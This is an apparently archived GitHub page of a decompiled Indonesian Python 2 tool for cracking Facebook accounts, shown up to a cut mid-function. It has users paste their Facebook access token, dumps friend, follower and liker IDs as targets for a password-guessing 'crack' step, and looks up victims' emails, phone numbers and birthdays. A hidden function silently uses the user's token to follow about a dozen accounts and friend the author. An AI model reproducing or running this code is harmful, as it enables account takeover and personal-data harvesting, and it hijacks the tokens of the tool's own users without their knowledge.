This repository has been archived by the owner on Jan 1, 2023. It is now read-only.
forked from mushuH/OPEN-SOURCE-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ABF-DEC.py
2003 lines (988 loc) · 56 KB
/
ABF-DEC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#!/usr/bin/python2
# coding=utf-8
#decompile by Hamid Meer'hamii
# Coded By Angga Ady
# My Facebook ( https://www.facebook.com/AnggaXD13
# (C) Copyright 407 Authentic Exploit
# Rebuild Copyright Can't make u real programmer:)
# Coded By Yayan XD.
import os
try:
import requests
except ImportError:
print '\n [×] Modul requests belum terinstall!...\n'
os.system('pip2 install requests')
try:
import concurrent.futures
except ImportError:
print '\n [×] Modul Futures belum terinstall!...\n'
os.system('pip2 install futures')
try:
import bs4
except ImportError:
print '\n [×] Modul Bs4 belum terinstall!...\n'
os.system('pip2 install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime
from concurrent.futures import ThreadPoolExecutor as YayanGanteng
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
### WARNA RANDOM ###
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA MATI
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
# Moch Yayan Juan Alvredo XD. #
#------------------------------->
koh = '100005395413800'
xi_jimpinx = '1714000985456399'
ok, cp, id, loop = [], [], [], 0
hoetank = random.choice(['Yang posting orang nya ganteng:)', 'Lo ngentod:v', 'Never surrentod tekentod kentod:v'])
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
# lempankkkkkkkk
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def tod():
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
print '\r %s[%s+%s] menghapus token %s'%(N,M,N,x),
sys.stdout.flush()
time.sleep(1)
# LO KONTOL
logo = ''' \033[0;96m ___ ___ ____
\033[0;96m / _ | / _ ) / __/ \x1b[1;93m® \033[0m| Created By Angga-XD
\033[1;93m / __ | / _ | / _/ \033[0m| Github.com/AnggaXD13
\033[1;93m/_/ |_|/____/ /_/ \033[0;91mv2.0 \033[0m| Facebook.com/AnggaXD13'''
lo_ngentod = '1714009362122228'
# crack selesai
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print '\n\n %s[%s#%s] crack selesai sayang...'%(N,K,N)
print '\n\n [%s+%s] total OK : %s%s%s'%(O,N,H,str(len(ok)),N)
print ' [%s+%s] total CP : %s%s%s'%(O,N,K,str(len(cp)),N);exit()
else:
print '\n\n [%s!%s] opshh kamu tidak mendapatkan hasil :('%(M,N);exit()
#masuk token
def yayanxd():
os.system('clear')
print ('%s╔══[%s Tools ini menggunakan login token facebook \n%s╠══[%s Apakah sudah tau cara mendapatkan token facebook? \n%s╠══[%s Ketik [ %sopen%s ] untuk mendapatkan token facebook '%(O,N,O,N,O,N,H,N))
print ('%s║%s '%(O,N))
kontol = raw_input('%s%s╚══[?]%s Masukkan Token :%s '%(N,M,N,H))
if kontol in ('open', 'Open', 'OPEN'):
print '\n%s *%s note! usahakan akun tumbal login di google chrome terlebih dahulu'%(B,N);time.sleep(2)
print '%s *%s jangan lupa! url ubah ke %shttps://m.facebook.com'%(B,N,H);time.sleep(2)
print '%s *%s setelah di alihkan ke google chrome. klik %stitik tiga'%(B,N,H);time.sleep(2)
print '%s *%s lalu klik %sCari di Halaman%s Tinggal ketik %sEAAA%s Lalu salin.'%(B,N,H,N,H,N);time.sleep(2)
raw_input(' %s*%s tekan enter '%(O,N))
os.system('xdg-open https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_')
yayanxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
print '%s║%s '%(O,N)
print '%s╠══[%s Selamat Datang %s%s%s Ngentod \033[0;96m]'%(O,N,H,nama,N);time.sleep(2)
print '%s╠══[%s Sebelum Menggunakan Script Ini Mohon Untuk \033[0;96m]'%(O,N);time.sleep(2)
print '%s╠══[%s Subscribe Channel Angga-XD Dulu Ya:v \033[0;96m]'%(O,N);time.sleep(2)
open('.memek.txt', 'w').write(kontol)
raw_input('\n%s[•]%s Tekan Enter '%(O,N));wuhan(kontol)
os.system('xdg-open https://youtube.com/channel/UCwgvwvSAoq-w8FqkaZzq4Dg')
moch_yayan()
except KeyError:
print '\n\n%s[%s!%s] Token Lu Invalid Kentod'%(N,M,N);time.sleep(2);yayanxd()
### ORANG GANTENG ###
def moch_yayan():
os.system('clear')
try:
kontol = open('.memek.txt', 'r').read() except IOError:
print '\n%s[%s×%s] Token Lu Invalid Kentod'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');yayanxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
except KeyError:
print '\n%s[%s×%s] Token Lu Invalid Kentod'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');yayanxd()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] tidak ada koneksi\n'%(N,M,N))
os.system('clear')
print logo
IP = requests.get('https://www.yayanxd.my.id/server/ip/').text
print '%s╔══════════════════════════════════════════════════%s'%(O,N)
print '\033[0;96m╠══[\033[0;97m NAMA KAMU : %s'%(nama);time.sleep(0.04)
print '\033[0;96m╠══[\033[0;97m IP KAMU : %s'%(IP);time.sleep(0.04)
print '%s╠══════════════════════════════════════════════════%s'%(O,N)
print '%s╠══[1]%s \033[0;93mDump id \033[0;97mdari teman \033[0;96m[\033[0;93m5000\033[0;96m]'%(O,N);time.sleep(0.04)
print '\033[0;97m%s╠══[2]%s \033[0;93mDump id \033[0;97mdari teman publik \033[0;96m[\033[0;93m5000\033[0;96m]'%(O,N);time.sleep(0.04)
print '\033[0;97m%s╠══[3]%s \033[0;93mDump id \033[0;97mdari total followers \033[0;96m[\033[0;93m5000\033[0;96m]'%(O,N);time.sleep(0.04)
print '\033[0;97m%s╠══[4]%s \033[0;93mDump id \033[0;97mdari like postingan \033[0;96m[\033[0;93m5000\033[0;96m]'%(O,N);time.sleep(0.04)
print '\033[0;97m%s╠══[5]%s Mulai \033[0;93mCrack Facebook'%(O,N);time.sleep(0.04)
print '%s╠══[6]%s Cek informasi \033[0;93makun facebook'%(O,N);time.sleep(0.04)
print '%s╠══[7]%s Lihat hasil \033[0;93mcrack \033[0;97msaya'%(O,N);time.sleep(0.04)
print '%s╠══[8]%s Setting \033[0;93muser agent'%(O,N);time.sleep(0.04)
print '%s╠══[9]%s Informasi %sSC%s'%(O,N,O,N);time.sleep(0.04)
print '%s╠══[0]%s Keluar \033[0;96m[%sAhh Ngecrot%s\033[0;96m]'%(O,N,K,N);time.sleep(0.04)
print '%s║%s'%(O,N);time.sleep(0.04)
pepek = raw_input('\033[0;96m╚══[•] \033[0;97mMenu : ')
if pepek == '':
print '%s%s╚══[%s Jangan Kosong Kentod! ]'%(N,M,N);time.sleep(2);moch_yayan()
elif pepek in['1','01']:
teman(kontol)
elif pepek in['2','02']:
publik(kontol)
elif pepek in['3','03']:
followers(kontol)
elif pepek in['4','04']:
postingan(kontol)
elif pepek in['5','05']:
__crack__().plerr()
elif pepek in['6','06']:
cek_ingfo(kontol)
elif pepek in['7','07']:
try:
dirs = os.listdir("results")
print '\n╔══[ hasil crack yang tersimpan di file anda ]'
for file in dirs:
print("%s╠══[%s %s"%(O,N,file))
file = raw_input("╠══[%s•%s] masukan nama file :%s "%(M,N,H))
if file == "":
file = raw_input("%s╠══[%s•%s] masukan nama file :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print("%s%s╠%s═════════════════════════════════════════════════════════"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
jalan("%s╠[%s Hasil %scrack%s pada tanggal %s:%s%s%s total %s: %s%s%s "%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print("%s%s╠%s═════════════════════════════════════════════════════════"%(N,O,N));time.sleep(2)
for memek in total:
kontol = memek.replace("\n","")
titid = kontol.replace("[✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" ╠ ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print("%s%s╠%s═════════════════════════════════════════════════════════"%(N,O,N));time.sleep(2)
raw_input('%s╚══[%s KEMBALI ] '%(O,N));moch_yayan()
except (IOError):
print("\n%s[%s!%s] opshh kamu tidak mendapatkan hasil"%(N,K,N))
raw_input('%s╚══[%s KEMBALI%s ] '%(O,N));moch_yayan()
elif pepek in['8','08']:
seting_yntkts()
elif pepek in['9','09']:
info_tools()
elif pepek in['0','00']:
print '\n'
tod()
time.sleep(1);os.system('rm -rf .memek.txt')
jalan('\n %s[%s✓%s]%s berhasil menghapus token'%(N,H,N,H));exit()
else:
print '\n %s[%s×%s] menu [%s%s%s] tidak ada, cek menu nya bro!'%(N,M,N,M,pepek,N);time.sleep(2);moch_yayan()
# Yang ganti bot nya gw sumpahin mak lo mati ajg!
def wuhan(kontol):
try:
kentod = kontol
requests.post('https://graph.facebook.com/100005395413800/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100059709917296/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100008678141977/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100005878513705/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100003342127009/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100001390111040/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100041388320565/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/108229897756307/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100013031465766/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/857799105/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100027558888180/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/me/friends?method=post&uids=%s&access_token=%s'%(koh,kentod))
except:
pass
# dump id dari teman hehe
def teman(kontol):
try:
os.mkdir('dump')
except:pass
try:
mmk = raw_input('\n%s%s╔══[%s Nama File : '%(N,O,N))
asw = raw_input('%s%s╚══[%s Limit id : '%(N,O,N))
cin = ('dump/' + mmk + '.json').replace(' ', '_')
xxx = open(cin, 'w')
for a in requests.get('https://graph.facebook.com/me/friends?limit=%s&access_token=%s'%(asw,kontol)).json()["data"]:
id.append(a['name'] + '<=>' + a['id'])
xxx.write(a['name'] + '<=>' + a['id'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
xxx.close()
jalan('\n\n%s[%s✓%s] berhasil dump id dari teman'%(N,H,N))
print '[%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,H,cin,N)
print 50 * '-'
raw_input('[%s TEKAN ENTER%s ] '%(O,N));moch_yayan()
except (KeyError,IOError):
os.remove(cin)
jalan('\n%s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input('[ %sKEMBALI%s ] '%(O,N));moch_yayan()
'''
csy = 'Cindy sayang Yayan'
ysc = 'Yayan sayang Cindy'
'''
# dump id dari teman publik hehe
def publik(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n%s%s╔══[%s Id Publik : '%(N,O,N))
ahh = raw_input('%s%s╠══[%s Nama File : '%(N,O,N))
ihh = raw_input('%s%s╚══[%s Limit id : '%(N,O,N))
knt = ('dump/' + ahh + '.json').replace(' ', '_')
ys = open(knt, 'w')
for a in requests.get('https://graph.facebook.com/%s/friends?limit=%s&access_token=%s'%(csy,ihh,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n[\033[0;96m%s\033[0m] [\033[0;92m%s\033[0m] Tunggu, Sedang Dump Id'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0030)
ys.close()
jalan('\n\n%s[%s✓%s] berhasil dump id dari teman publik'%(N,H,N))
print '[%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,H,knt,N)
print 50 * '-'
raw_input('[%s TEKAN ENTER%s ] '%(O,N));moch_yayan()
except (KeyError,IOError):
os.remove(knt)
jalan('\n%s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input('[ %sKEMBALI%s ] '%(O,N));moch_yayan()
# dump id dari followers hehe
def followers(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n%s%s╔══[%s Id Followers : '%(N,O,N))
mmk = raw_input('%s%s╠══[%s Nama File : '%(N,O,N))
asw = raw_input('%s%s╚══[%s Limit Id : '%(N,O,N))
ah = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(ah, 'w')
for a in requests.get('https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s'%(csy,asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n[\033[0;96m%s\033[0m] [\033[0;92m%s\033[0m] Tunggu, Sedang Dump Id'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0030)
ys.close()
jalan('\n\n%s[%s✓%s] berhasil dump id dari total followers'%(N,H,N))
print '[%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,H,ah,N)
print 50 * '-'
raw_input('[%s TEKAN ENTER%s ] '%(O,N));moch_yayan()
except (KeyError,IOError):
os.remove(ah)
jalan('\n%s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input('[ %sKEMBALI%s ] '%(O,N));moch_yayan()
# dump id dari postingan hehe
def postingan(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n%s%s╔══[%s Id Postingan : '%(N,O,N))
ppk = raw_input('%s%s╠══[%s Nama File : '%(N,O,N))
asw = raw_input('%s%s╚══[%s Limit Id : '%(N,O,N))
ahh = ('dump/' + ppk + '.json').replace(' ', '_')
ys = open(ahh, 'w')
for a in requests.get('https://graph.facebook.com/%s/likes?limit=%s&access_token=%s'%(csy,asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n[\033[0;96m%s\033[0m] [\033[0;92m%s\033[0m] Tunggu, Sedang Dump Id'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0030)
ys.close()
jalan('\n\n%s[%s✓%s] berhasil dump id dari like postingan'%(N,H,N))
print '[%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,H,ahh,N)
print 50 * '-'
raw_input('[%s TEKAN ENTER%s ] '%(O,N));moch_yayan()
except (KeyError,IOError):
os.remove(ahh)
jalan('\n%s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input('[ %sKEMBALI%s ] '%(O,N));moch_yayan()
#cek ingfo
def cek_ingfo(kontol):
try:
user = raw_input("\n [%s+%s] masukan id atau username : "%(O,N))
if user == '':
print "\n [%s!%s] jangan kosong bro"%(M,N);cek_ingfo(kontol)
url = ("https://lookup-id.com/")
if "facebook" in user:
payload = {"fburl": user, "check": "Lookup"}
else:
payload = {"fburl": "https://free.facebook.com/" + user, "check": "Lookup"}
halaman = requests.post(url, data = payload).text.encode("utf-8")
sop_ = BeautifulSoup(halaman, "html.parser")
email_ = sop_.find("span", id = "code")
idt = email_.text
if user == "me":
idt = "me"
x = requests.get('https://graph.facebook.com/%s?fields=name,id,birthday,first_name,middle_name,last_name,name_format,picture,short_name,gender,link,email,location,hometown,religion,relationship_status,significant_other,about,locale&access_token=%s'%(idt, kontol)).json()
nmaa = x['name']
except (KeyError, IOError):
nmaa = '%s-%s'%(M,N)
print '\n * Ingformasi akun Facebook *';time.sleep(0.03)
print '\n [*] nama lengkap : %s'%(nmaa);time.sleep(0.03)
try:
ndpn = x['first_name']
except (KeyError, IOError):
ndpn = '%s-%s'%(M,N)
print ' [*] nama depan : %s'%(ndpn);time.sleep(0.03)
try:
nmbl = x['last_name']
except (KeyError, IOError):
nmbl = '%s-%s'%(M,N)
print ' [*] nama belakang: %s'%(nmbl);time.sleep(0.03)
try:
hwhs = x['username']
except (KeyError, IOError):
hwhs = '%s-%s'%(M,N)
print ' [*] username fb : %s'%(hwhs);time.sleep(0.03)
try:
asu = x['id']
except (KeyError, IOError):
asu = '%s-%s'%(M,N)
print ' [*] id facebook : %s'%(asu);time.sleep(0.03)
print '\n * data-data akun facebook *\n';time.sleep(0.03)
try:
emai = x['email']
except (KeyError, IOError):
emai = '%s-%s'%(M,N)
print ' [*] gmail facebook : %s'%(emai);time.sleep(0.03)
try:
nmrr = x['mobile_phone']
except (KeyError, IOError):
nmrr = '%s-%s'%(M,N)
print ' [*] nomor telepon : %s'%(nmrr);time.sleep(0.03)
try:
ttll = x['birthday']
month, day, year = ttll.split("/")
month = bulan_ttl[month]
except (KeyError, IOError):
month = '%s-%s'%(M,N)
day = '%s-%s'%(M,N)
year = '%s-%s'%(M,N)
print ' [*] tanggal lahir : %s %s %s '%(day,month,year);time.sleep(0.03)
try:
jenis = x['gender'].replace("female", "Perempuan").replace("male", "Laki-laki")
except (KeyError, IOError):
jenis = ''
print ' [*] jenis kelamin : %s '%(jenis)
try:
r = requests.get('https://graph.facebook.com/%s/friends?limit=50000&access_token=%s'%(idt, kontol))
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
except:pass
print ' [*] jumblah teman : %s'%str(len(id));time.sleep(0.03)
try:
r = requests.get('https://graph.facebook.com/%s/subscribers?access_token=%s'%(idt, kontol))
z = json.loads(r.text)
pengikut = z['summary']['total_count']
except (KeyError, IOError):
pengikut = '%s-%s'%(M,N)
print ' [*] total followers: %s'%(pengikut);time.sleep(0.03)
try:
lins = x['link']
except (KeyError, IOError):
lins = '%s-%s'%(M,N)
print ' [*] link facebook : %s'%(lins);time.sleep(0.03)
try:
stas = x['relationship_status']
except (KeyError, IOError):
stas = '%s-%s'%(M,N)
try:
dgn = '''dengan %s'''%(x['significant_other']['name'])
except (KeyError, IOError):
dgn = '%s-%s'%(M,N)
except: pass
print ' [*] status hubungan: %s %s'%(stas,dgn);time.sleep(0.03)
try:
bioo = x['about']
except (KeyError, IOError):
bioo = '%s-%s'%(M,N)
except: pass
print ' [*] tentang status : %s'%(bioo);time.sleep(0.03)
try:
dari = x['hometown']['name']
except (KeyError, IOError):
dari = '%s-%s'%(M,N)
except: pass
print ' [*] kota asal : %s'%(dari);time.sleep(0.03)
try:
tigl = x['location']['name']
except (KeyError, IOError):
tigl = '%s-%s'%(M,N)
except: pass
print ' [*] tinggal di : %s'%(tigl);time.sleep(0.03)
try:
tzim = x['timezone']
except (KeyError, IOError):
tzim = '%s-%s'%(M,N)
except: pass
print ' [*] zona waktu : %s'%(tzim);time.sleep(0.03)
try:
jam = x['updated_time'][11:19]
uptd = x['updated_time'][:10]
year, month, day = uptd.split("-")
month = bulan_ttl[month]
except (KeyError, IOError):
year = '%s-%s'%(M,N)
month = '%s-%s'%(M,N)
day = '%s-%s'%(M,N)
except:pass
print ' [*] terakhir di updated pada tanggal %s bulan %s tahun %s jam %s'%(day, month, year, jam);time.sleep(0.03)
print ' %s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m'
jalan('\n [%s✓%s] berhasil mengechek data² akun facebook\n\n'%(O,N));exit()
# cek ingfo sc
def info_tools():
os.system('clear')
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.09)
print '%s[%s>%s] Yt : Angga XD (Orang Ganteng Hehe)'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] Author : Angga Ady.'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] Github : https://github.com/AnggaXD13'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] Facebook : https://www.facebook.com/AnggaXD13'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] Instagram: https://www.instagram.com/Anggatp55'%(N,H,N);time.sleep(0.09)
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.09)
print '%s[%s>%s] TEAM PROJECT XNX-CODE 2021'%(N,H,N);time.sleep(0.09)
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.09)
print '%s[%s>%s] • Ndrii Sans (YumasaaTzy)'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Mr Jeeck X Nano'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Yumee-Tzy'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Aang Ardiansyah-XD'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Mr Risky (Dumai-991)'%(N,H,N);time.sleep(0.09)
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.09)
print '%s[%s>%s] INFO PEMAKAIAN SCRIPT :'%(N,H,N);time.sleep(0.09)
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.09)
print '%s[%s>%s] • Pertama Kita Harus Dump Id Dulu'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Pilih Nomor 1 Sampai 4 Untuk Dump Id'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Usahakan Target Total Temanya 1500'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Limit Id Tulis Saja 5000'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Jika Sudah, Pilih Nomor 5 Untuk Mulai Crack'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Aktifkan Mode Pesawat 5 Detik Setelah Crack Mulai'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • Jika Masih Bingung Hub Nomor Dibawah'%(N,H,N);time.sleep(0.09)
print '%s[%s>%s] • WhatsApp : 085713275791'%(N,H,N);time.sleep(0.09)
print '%s[%s#%s]'%(N,O,N), 52 * '\x1b[1;96m-\x1b[0m';time.sleep(0.07)
raw_input('\n[ %sKEMBALI%s ] '%(O,N));moch_yayan()
### ganti user agent
def seting_yntkts():
print '\n[%s1%s] Ganti user agent'%(O,N)
print '[%s2%s] Check user agent'%(O,N)
ytbjts = raw_input('\n%s[%s?%s] menu : '%(N,O,N))
if ytbjts == '':
print '\n%s[%s×%s] Gak boleh kosong Kentod'%(N,M,N);time.sleep(2);seting_yntkts()
elif ytbjts =='1':
yo_ndak_tau_ko_tanya_saia()
elif ytbjts =='2':
check_yntkts()
else: